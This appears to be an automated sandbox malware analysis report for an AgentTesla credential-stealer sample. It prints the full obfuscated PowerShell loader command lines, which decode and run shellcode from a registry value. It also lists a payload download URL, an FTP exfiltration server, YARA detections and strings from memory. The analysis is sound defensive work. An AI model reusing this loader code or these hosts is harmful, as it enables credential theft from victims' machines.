BExECa8PrCSw4TeDFo7IdDFe6PaCLeDSoCVi4DiCRi9FaFGe8Sq9TuFHo9MaFGoEsa2FuCAl0LeDSj1InEHo1CoCSk0BoCPa9UnCAf0FuCpa2SpCCy4AfDup1BeCOv0FjEgu3TrCOlAUnDNo7acEKi3JoDWa0NaCDaBBaCSe6PrDSa1BeCfrCHiCudATrCSoBMyFPe5OvCMeAUpCGaCVeCopBPaDLu1UsCde0FlDhu7Sv8VeDBe8UnDBuCUg3GuCAfEHyDPi5Ur8Ne5ls8Mb1FoFAk0StCkuBWoCAa6TrCBaAUrDDr0MoDFs5MeCJu9GiCUn0Di8Of5Gt8Sk1BiEPr2DdCUdDHyCKo0UnCEu2ExCAeCSeDBl6ChCTiDQu9Dr1Ab8TeCPr8Cr9Go8As5Pl8OvDDiEPe2SpEIn1ScFEn1Wo8Va5KaETr5Ca8OmDGiFstEinEJaCUnCScBDiDUr1syFAn5WoDSt1KoDbo7ReFPr8Ln8Co9eq8Pr5ImFPrEHyFAc0ExEReCAmCsiBCoDFr1Ps9Be6Pi9Ti7VaFMi8Pa8Ov9Po8Mu5BlFPeELsFDe0MoEapCHvCAmBBlDOp1Ek9de6Ge9Un7TeFTi8Op8Ex9In8Hv5HaFSnEGaFHj0exEFiCcoCSyBSwDFl1Vi9St6St9St7RiFNr8Tm8BiCLo8Sk5Un8BaDLaFTrEReEdoCStCBiBMaDTr1AcFSi5BoDDe1NiDCo7BlFSa8Hy8SpCSe8ArCBi8EdCHi'Tr;Fe&In(na`$InGArhCaeungiriElsUnhSh7Ju)Om Di`$AmHeeoFoePrrAdeRusVi6Po;Fi`$ReDOkmEdnEniMonSkgMasFopPrrCyoLajEgeBukBetTrebarCo In=Ch FofPrkBapha Sc`$ReGGehIneNagIliPesNehPr5Un Re`$HuGObhBieStgKviNosFohPs6Re;La`$EkHreoFoeTirBoeGasPu7Sv Re=Ch KrSTemPreIkrUntVoeGenPesDibToaUtrSanHjsAp0Fo Or'Ri8mi1GgFHd6PrDSa0MeCSyEPaCseEInCde0CiDRh7KrCCoALiDGe3FiCfr0ShDEn7HyDTo1DrDIn7BeCCeEReCKaEReCSo0SkDti1AfDAf6Ta9Ov6Le8Ud5Et9Fi8Sp8ka5Dy8Yo1JoFSp2FoCSy0HoDIn7UlCMa0BoDSi7reCSe4DaDTe1Fl8TiBVaEIfCCrCKaBTrDPo3opCUvAHeCLaESeCSq0Un8TrDUnFUnEOrEReCBaCPaBvaDRe1beFNo5KoDPo1RuDEl7ViFBu8Fa9PsFEt9TeFToFcoFSpCKo0OvDSc7BrCOuABa8Ur9Om8Se5Un9An6Re9Fa0It9LtCMe8Se9Sl8Fl5Me9Pe5SkDUnDFe9Va6Pa9Kb5Kl9Bo5Ha9Fo5Pu8Sv9Bj8St5Un9Ci5PuDLaDQu9Co1Po9Ud5Va8TuCTi'Ch;an&de(Fa`$UnGCohAneLagOpiThsObhUn7Sn)Al Di`$GaHFroEneHorVgeTasSt7Si;Ha`$TiHOvoLaePurPaeGasKo8Ti In=Ha DrSKumNeeHerHytSheDenHesHobEkaArrPenRisDi0Co Af'Pe8St1UnEPa6CrCstABeDIn7seDPa7ClCWhAKeCTy7NiCSe7KvCMeAExDth7BaCDu0UnCSe0Sp8An5Ga9Pr8Ud8Om5Su8ga1QuFFo2leCSe0TeDGa7BoCRa0BeDWa7SpCSk4IgDUn1Ca8RiBafEKrCUtCJuBSuDTi3PrCRuAAsCTrEEuCSk0Un8DeDMoFSoEKuEEsCOmCCaBSuDDo1CoFBi5UbDFl1MoDUn7InFIn8He9HaFFo9DeFmaFChFErCPr0SaDPo7AlCFrAWa8Bi9Ta8Ch5Ap9Sl5KbDKiDPh9Te4Fe9No5re9Bn5Lg9Sl5Ow9An5Sk9Gy5Es8Am9Va8Su5Au9Bu5etDLoDPr9Pa6Or9Af5Fi9Ru5Ca9Ca5Uu8Si9Sp8At5Ha9Un5KaDBaDTu9op1De8tiCFl'Re;Ko&Sh(li`$NaGAnhPeePrgCoiHusSphUn7Sa)Ro Hi`$TeHstoSpeHirLaeBesSa8po;Un`$PrCRuaSyrNotLawVorThiStgCahArtUniGenFlgBe=Pa(SmGUneIntCo-OpIKltpeeTemWaPUnrSooInpDoeAgrSotKayBa Ma-SePbeaSptRehOx Bi'GoHPrKNeCPlUBi:Fo\LyPBasUdeInuRadSaaFemhobGauOnlLoaTpcParStualmSk\CykVeoRenFesXmtSqiAntSeuSttTaiUtoLunLseJelFe'Ge)Di.WaBTijHgfHesFo;Ly`$InHFloHoeMerSkeAasAn9Bl Op=Pa HoSJvmBreNerSktNoeJanKrsPabHeaTrrronYosUn0Af St'Ha8Fo1PaECuDSwCMeAFiCHe0AcDCe7ReCSe0MiDSt6Rg8Wa5Af9Mu8Ob8Pi5NoFVaEInFIn6UnDseCTuDSp6DaDWe1ChCNu0MiCGu8Ku8DeBNeEUn6AlCPlADeCSmBExDCh3PeCEv0SeDKa7crDHi1ToFTe8Sk9RdFAn9PhFFrESa3DrDAn7CeCImAHaCAn8MaENo7unCFo4UnDsk6BaCFe0Re9Ti3Fl9Fj1KaFAn6BuDSy1EnDDo7FrCLaCPoCBlBSkCPr2Re8EnDsy8Ln1AdEPi6EvCLa4kjDSl7TaDPa1OtDFi2PsDLa7NyCVeCSaCMu2SkCBeDBuDji1SkCEfCviCJaBSpCPr2Op8TaCBe'Bu;ha&He(Mi`$esGAnhNoeBlgChiShsLohFo7Sh)Ja St`$WiHMeoLaeBarBleHasCo9dv;Ty`$FrCGoagerSotFowDerLaiHagmihbetkoiPenSsgAn0Bn Ba=Ca ChSSamLoeAcrNatdueApnpasSabGaaGorBonSvsPr0Ya Bi'PoFCeEElFag6EkDDiCRaDCo6TeDAl1OvCvi0MeCRe8Sk8UdBAlFEl7FoDBl0CoCAaBAnDTr1PrCTrCFoCHe8TiCHu0or8UnBHrEstCKeCCyBTeDBo1VrCIn0meDPu7AiCItAPrDTu5RuFBe6FuCDe0FlDAn7OuDSl3LeCMaCPiCDi6DiCSo0UnDBo6Ve8syBBrEMe8EpCZo4StDSe7SaDSl6PeCElDDeCEl4HeCMe9KoFPr8Op9unFWo9GlFBlENu6FoCPaASpDma5ToDRuCSt8FlDAu8Pa1GaEOuDcuCEkACaCBu0IvDLi7KrCEl0GeDAb6Va8Is9Fa8Pa5Ko9To5Pa8Ol9Hy8Sm5Se8Ta5Fu8Be1DrFFu6MdDOv0klCUnEDiCUnEArCLi0PlDTe7trCGiASlDBa3AgCSt0puDAr7SeDCe1baDPy7prCKlEfeCJuEElCRd0TaDBa1GiDUd6Af9dr6Pe8Fe9Ja8af5Ga9Ka6as9Im0Po9AnCPa8MaCOr'in;Tr&An(Ud`$GaGWhhFleFlgReiOpsSchSa7Ov)sp En`$PrCPraBerRetSuwLerSmiUngPrhHatUniDinIjgSt0Ov;pr`$NeNMaoSonOscStoStnCrdGoiEnmEneblnSytGo2De=Ub`$LiHUloTreDirSaeFosUn.WecFioLauAnnOutMa-pi3Sm5Re9Ur;Sk`$paCBeaTorFotExwSirYaiSngmihGatKoiBankngTr1Em Ba=Bu UnSMomSgeSurRetRueFanCasTwbAmaFrrGanSusBi0St ar'AuFKoELoFev6AsDHyCNoDNa6UdDNi1BaCSt0WiCMu8Ve8ClBmuFPy7UnDBu0HyCemBStDPe1GrCopCpaCCa8CaCSc0Re8LsBHuESaCWoCPlBDiDHa1CoCpa0HiDMy7NoCSpApaDUt5CaFBo6DiCAn0MaDDe7SeDFi3UnCreCHuCBi6sqCPl0MoDhi6Ou8BuBSaESe8ThCPr4ViDKu7SnDCy6BeCNoDLaCCh4MiCFe9NiFPa8An9TaFPo9KaFReEFo6SeCWhADoDOu5NoDHoCPe8ReDTr8Sp1DrEvaDNeCbyAFoCCa0spDAs7GiCSp0UnDTo6Sk8fj9Sa8In5Ge9Sa6Fe9Ur0Th9ThCDk8cu9Co8Ba5Ov8Su1LoEDe6ruCOrApiDkl7CoDDe7SuCbuACiCHy7afCHi7GaCLuAEkDTu7UnCPi0PrCEk0Pa8Pi9Un8La5st8ud1SkEAnBChCEnASkCDoBTmCVa6ViCTeAJuCFaBVaCSt1KaCunCKiCaf8MoCMa0SeCMeBPlDSh1Et9be7In8RoCHa'Vo;Mo&Br(Tr`$FlGRehReeAigFeiTesgahPh7Wh)Fo Sh`$TeCcoaInrRetUdwForEfistgYahIbtspiUdnFagSo1St;Ed`$FrCPraNorSmtPewStrKliBdgKohCotEniPonFigAn2ba St=do stSPrmUneimrRetAdeClnStsKobBuadirDinHosDi0Tr to'Su8Br1AnCRoEfjCNo9VuCSa4MiDZo7StCFl2UkCWeFPrCSkAStDSl7WiCUn1BoCMi0Br8Bn5He9Sk8Vi8Ka5BaFInEBlFAj6InDDoCudDCi6AnDSl1InCSt0InCSy8Le8AyBTiFce7AsDNo0DeCImBAlDNo1NiCBiCSlCTi8VoCSe0Fu8ReBGaEnoCDeCOmBChDMe1TeCMa0BaDus7KeCPeAWaDFe5clFFo6BuCLa0ReDDe7NoDJe3StCHyCAlCSt6SkCDi0BeDMe6bl8AnBkoEEt8AfCAc4TiDBa7DrDSt6AhCSkDGiCLi4NoCFu9AsFSp8uj9ReFDi9RoFSuEBa2ApCKo0unDGr1HiEFi1GrCGu0diCPe9KoCJa0DeCFr2ReCUn4phDmu1DaCEp0MiEDe3ubCJoAReDbl7vaEma3SkDBa0ToCPsBSkCTy6reDPo1GhCDeCMaCTeASkCTiBUdFFo5UnCWeAEuCHoCLaCTrBAnDEr1AlCMa0ThDCh7Hi8coDfo8un1GeFTr6KeDAd0PaCPeESkCBoEhaCEk0noDRe7AeCPeAMoDGu3UnCTe0DiDim7RaDCa1HeDud7PeCTiEInCCoESiCMo0NoDSh1JoDBu6Oo9Vi6Ha8Cr9Ro8An5Tu8UvDinEKo2VuEAr1ouFLe1De8Co5PlESy5Se8CaDtaFDyEFdERvCBaCPhBBgDTo1PuFKa5UnDla1UlDJo7ToFSu8An8Sv9UnFSpEMeEDeCRaCAfBKoDAp1AfFVe5beDUn1UnDAl7DsFSc8Du8CoCLo8Ca5Kv8SnDFrFCuEElFQu3HeCPaAPrCRoCTrCIn1HaFTa8Ma8BiCIt8GuCOv8AbCMu'He;Re&St(Gr`$SpGSihBeePrgSpiFasTehJu7Ga)Gr Un`$ChCtralerHotRewUnrTeibigUnhEstSkiNonStgGa2gu;Ma`$BiCPiaUnrUntOuwAdrUniUngElhTitDiiStnMogDa3Fl Br=Li TiSCemSaeAsrBotmaeRenDesgebkyaMorFlnStsHj0Sy Mo'Gr8Wi1saCReEfiCTy9TuCTi4TiDpe7riCDm2TeCOpFMaCFrAKrDSe7GrCKr1CiCIn0Le8BaBTaEMiCcoCKrBKeDFa3DiCBrAkaCTrEBrCFu0Hj8DiDAp8Go1LoEje6ReCOmAVeDKn7FoDBo7ReCGbAOnCDe7SlCOp7HaCRaAFeDQu7PsCMe0GrCmy0Sk8Si9Ko8Et1MaEac1NoCPl8BlCBrBTbCGaCFoCVrBCoCUn2BiDPs6HeDBr5ZoDAc7WhCChACoCSpFLsCGh0BjCUsECoDLa1stCma0inDSp7Gl8SaCMa'Di;Ph&Bi(Al`$DeGAmhGreGigSkiAmsFohSa7Me)Mo To`$FaCShaMarSvtFlwDirKliBrgMahcitnaiTrnFogSu3Ta#Ga;""";;Function Cartwrighting9 { param([String]$Regionsplanlovs); For($Klistringer=2; $Klistringer -lt $Regionsplanlovs.Length-1; $Klistringer+=(2+1)){ $Smertensbarns = $Smertensbarns + $Regionsplanlovs.Substring($Klistringer, 1); } $Smertensbarns;}$talose0 = Cartwrighting9 'CeIFoEReXPr ';$talose1= Cartwrighting9 $Vildmnd;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $talose1 ;}else{.$talose0 $talose1;} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 8364 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C38D8DEBC0D288EAC7CFC0C6D185ECCBD1F5D1D78C89858D81EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6908C8C8BECCBD3CACEC08D81CBD0C9C98985E58D81F0D5C2D7CAD2CB8C8C8C8C898581E1C0D5D7C0D6D6CCCACBD6D5C0D7CCCAC1C0D78C8C';&($Ghegish7) $Hoeres1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Nondecorously,[Parameter(Position = 1)] [Type] $Coeliomyalgia = [Void]);$Hoeres2 = Smertensbarns0 '81EDC4DCCBC0D6859885FEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE1C0C3CCCBC0E1DCCBC4C8CCC6E4D6D6C0C8C7C9DC8D8DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7C0C3C9C0C6D1CCCACB8BE4D6D6C0C8C7C9DCEBC4C8C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D69D8C8C8985FEF6DCD6D1C0C88BF7C0C3C9C0C6D1CCCACB8BE0C8CCD18BE4D6D6C0C8C7C9DCE7D0CCC9C1C0D7E4C6C6C0D6D6F89F9FF7D0CB8C8BE1C0C3CCCBC0E1DCCBC4C8CCC6E8CAC1D0C9C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D69C898581C3C4C9D6C08C8BE1C0C3CCCBC0F1DCD5C08D81E2CDC0C2CCD6CD95898581E2CDC0C2CCD6CD948985FEF6DCD6D1C0C88BE8D0C9D1CCC6C4D6D1E1C0C9C0C2C4D1C0F88C';&($Ghegish7) $Hoeres2;$Hoeres3 = Smertensbarns0 '81EDC4DCCBC0D68BE1C0C3CCCBC0E6CACBD6D1D7D0C6D1CAD78D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6938985FEF6DCD6D1C0C88BF7C0C3C9C0C6D1CCCACB8BE6C4C9C9CCCBC2E6CACBD3C0CBD1CCCACBD6F89F9FF6D1C4CBC1C4D7C1898581EBCACBC1C0C6CAD7CAD0D6C9DC8C8BF6C0D1ECC8D5C9C0C8C0CBD1C4D1CCCACBE3C9C4C2D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6928C';&($Ghegish7) $Hoeres3;$Hoeres4 = Smertensbarns0 '81EDC4DCCBC0D68BE1C0C3CCCBC0E8C0D1CDCAC18D81E2CDC0C2CCD6CD97898581E2CDC0C2CCD6CD96898581E6CAC0C9CCCAC8DCC4C9C2CCC4898581EBCACBC1C0C6CAD7CAD0D6C9DC8C8BF6C0D1ECC8D5C9C0C8C0CBD1C4D1CCCACBE3C9C4C2D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6928C';&($Ghegish7) $Hoeres4;$Hoeres5 = Smertensbarns0 'D7C0D1D0D7CB8581EDC4DCCBC0D68BE6D7C0C4D1C0F1DCD5C08D8C';&($Ghegish7) $Hoeres5 ;}$Uncouple = Smertensbarns0 'CEC0D7CBC0C99697';$Hoeres6 = Smertensbarns0 '81F2C0D7C0D7C4D1859885FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE2C0D1E1C0C9C0C2C4D1C0E3CAD7E3D0CBC6D1CCCACBF5CACCCBD1C0D78D8DC3CED58581F0CBC6CAD0D5C9C08581E2CDC0C2CCD6CD918C89858DE2E1F185E58DFEECCBD1F5D1D7F88985FEF0ECCBD19697F88985FEF0ECCBD19697F88985FEF0ECCBD19697F88C858DFEECCBD1F5D1D7F88C8C8C';&($Ghegish7) $Hoeres6;$Dmningsprojekter = fkp $Ghegish5 $Ghegish6;$Hoeres7 = Smertensbarns0 '81F6D0CECEC0D7CAD3C0D7D1D7CECEC0D1D69685988581F2C0D7C0D7C4D18BECCBD3CACEC08DFEECCBD1F5D1D7F89F9FFFC0D7CA898596909C898595DD96959595898595DD91958C';&($Ghegish7) $Hoeres7;$Hoeres8 = Smertensbarns0 '81E6CAD7D7CAC7C7CAD7C0C085988581F2C0D7C0D7C4D18BECCBD3CACEC08DFEECCBD1F5D1D7F89F9FFFC0D7CA898595DD949595959595898595DD96959595898595DD918C';&($Ghegish7) $Hoeres8;$Cartwrighting=(Get-ItemProperty -Path 'HKCU:\Pseudambulacrum\konstitutionel').Bjfs;$Hoeres9 = Smertensbarns0 '81EDCAC0D7C0D6859885FEF6DCD6D1C0C88BE6CACBD3C0D7D1F89F9FE3D7CAC8E7C4D6C09391F6D1D7CCCBC28D81E6C4D7D1D2D7CCC2CDD1CCCBC28C';&($Ghegish7) $Hoeres9;$Cartwrighting0 = Smertensbarns0 'FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE6CAD5DC8D81EDCAC0D7C0D689859589858581F6D0CECEC0D7CAD3C0D7D1D7CECEC0D1D696898596909C8C';&($Ghegish7) $Cartwrighting0;$Noncondiment2=$Hoeres.count-359;$Cartwrighting1 = Smertensbarns0 'FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE6CAD5DC8D81EDCAC0D7C0D6898596909C898581E6CAD7D7CAC7C7CAD7C0C0898581EBCACBC6CACBC1CCC8C0CBD1978C';&($Ghegish7) $Cartwrighting1;$Cartwrighting2 = Smertensbarns0 '81CEC9C4D7C2CFCAD7C1C0859885FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE2C0D1E1C0C9C0C2C4D1C0E3CAD7E3D0CBC6D1CCCACBF5CACCCBD1C0D78D81F6D0CECEC0D7CAD3C0D7D1D7CECEC0D1D69689858DE2E1F185E58DFEECCBD1F5D1D7F889FEECCBD1F5D1D7F88C858DFEF3CACCC1F88C8C8C';&($Ghegish7) $Cartwrighting2;$Cartwrighting3 = Smertensbarns0 '81CEC9C4D7C2CFCAD7C1C08BECCBD3CACEC08D81E6CAD7D7CAC7C7CAD7C0C08981E1C8CBCCCBC2D6D5D7CACFC0CED1C0D78C';&($Ghegish7) $Cartwrighting3# MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • CasPol.exe (PID: 392 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: CasPol.exe PID: 392JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Process Memory Space: CasPol.exe PID: 392JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
          Source: Joe Sandbox ViewIP Address: 185.31.121.136 185.31.121.136
          Source: global trafficHTTP traffic detected: GET /wp-admin/ZCaVuIfIpDLfuryX16 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: b3solutionscws.comCache-Control: no-cache
          Source: unknownFTP traffic detected: 185.31.121.136:21 -> 192.168.11.20:49825 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ftp://ftp.mcmprint.netnoffice
          Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
          Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://OowQOv.com
          Source: CasPol.exe, 00000007.00000002.6650313755.00000000010DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16
          Source: CasPol.exe, 00000007.00000002.6650313755.00000000010DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16po
          Source: powershell.exe, 00000002.00000003.2155125374.0000026AAE6D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2457016446.0000026AAE735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: powershell.exe, 00000002.00000002.2456250636.0000026AAE70A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.2155125374.0000026AAE6D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: CasPol.exe, 00000007.00000002.6650870632.00000000010F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.micros
          Source: powershell.exe, 00000002.00000002.2164704518.0000026A961B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000002.00000002.2164704518.0000026A961B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wNUxderhdqerb.org
          Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
          Source: unknownDNS traffic detected: queries for: b3solutionscws.com
          Source: global trafficHTTP traffic detected: GET /wp-admin/ZCaVuIfIpDLfuryX16 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: b3solutionscws.comCache-Control: no-cache

          System Summary

          barindex
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu 